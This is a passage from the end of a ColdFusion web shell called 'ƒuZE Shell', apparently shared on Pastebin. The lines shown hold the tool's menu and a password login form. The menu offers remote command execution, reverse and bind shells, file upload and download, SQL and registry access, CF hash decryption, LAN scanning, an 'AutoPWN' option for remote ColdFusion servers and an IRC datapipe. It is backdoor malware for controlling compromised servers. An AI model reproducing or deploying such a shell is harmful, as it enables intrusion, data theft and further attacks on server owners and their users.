  929. //--------------------------------------------------//
  930.  
  931. }
  932.  
  933. }catch (Exception e) {
  934. writeoutput("Exception: Error#chr(10)#");
  935. }
  936. </cfscript>
  937. <cfcatch>Connection terminated</cfcatch>
  938. </cftry>
  939. </textarea>
  940. <cfelse>
  941. <pre>Waiting for input</pre>
  942. <textarea class="report" rows="20">Welcome to &fnof;uZE Shell</textarea>
  943. </cfif>
  944. </cfoutput></td><td width="25%">
  945. <div class="container">
  946.     <div class="menu">
  947.         <div id='nav'><a href="#execute" name="modal">:: Execute command on server ::</a></div>
  948.         <div id='nav'><a href="#reverse" name="modal">:: Reverse shell ::</a></div>
  949.         <div id='nav'><a href="#functions" name="modal">:: Functions ::</a></div>
  950.         <div id='nav'><a href="#updown" name="modal">:: Upload/download files on server ::</a></div>
  951.         <div id='nav'><a href="#runsql" name="modal">:: Run SQL query ::</a></div>
  952.         <div id='nav'><a href="#registry" name="modal">:: Registry ::</a></div>
  953.         <div id='nav'><a href="#edit" name="modal">:: Edit file ::</a></div>
  954.         <div id='nav'><a href="#bind" name="modal">:: Bindshell ::</a></div>
  955.         <div id='nav'><a href="#decrypt" name="modal">:: CF hash decrypter ::</a></div>
  956.         <div id='nav'><a href="#upremote" name="modal">:: Upload files from remote server ::</a></div>
  957.         <div id='nav'><a href="#scanlan" name="modal">:: Scan LAN for CF ::</a></div>
  958.         <div id='nav'><a href="#autopwn" name="modal">:: AutoPWN remote CF ::</a></div>
  959.         <div id='nav'><a href="#irc" name="modal">:: IRC datapipe ::</a></div>
  960.         <div id='nav'><a href="#nuke" name="modal">:: Nuke shell ::</a></div>
  961.     </div>
  962. </div>
  963. </td></tr>
  964. </table>
  965. <div>
  966.     <cfset tickEnd = GetTickCount()>
  967.     <cfset loopTime = tickEnd - tickBegin>
  968.     <center><pre>XiX<blink>_</blink> | &fnof;uZE | <cfoutput>#loopTime#ms</cfoutput></pre></center>
  969.     </cfif>
  970. </div>
  971. <cfif IsUserLoggedIn() eq "No">
  972.     <cfform name="LoginForm" method="post" format="html">
  973.         <center>
  974.         <table border="1" cellpadding="5" cellspacing="0">
  975.             <tr>
  976.                 <td colspan="2" align="center">
  977.                     <img src="<cfoutput>#icon#</cfoutput>">
  978.                 </td>
  979.             </tr>
  980.             <tr valign="top">
  981.                 <td>UserName</td>
  982.                 <td>
  983.                     <cfinput name="UserName" type="text" id="_color" style="background-color:666666; color:White; width:250px; height:25px;">
  984.                 </td>
  985.             </tr>
  986.             <tr valign="top">
  987.                 <td>Password</td>
  988.                 <td>
  989.                     <cfinput name="Password" type="password" style="background-color:666666; color:White; width:250px; height:25px;">
  990.                 </td>
  991.             </tr>
  992.             <tr valign="top">
  993.                 <td colspan="2" align="right">
  994.                     <cfinput class="_btn" type="submit" name="LoginButton" value="Login">
  995.                 </td>
  996.             </tr>
  997.         </table>
  998.         </center>
  999.     </cfform>
  1000. </cfif>
  1001.  
  1002. </body>
  1003.  
  1004. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top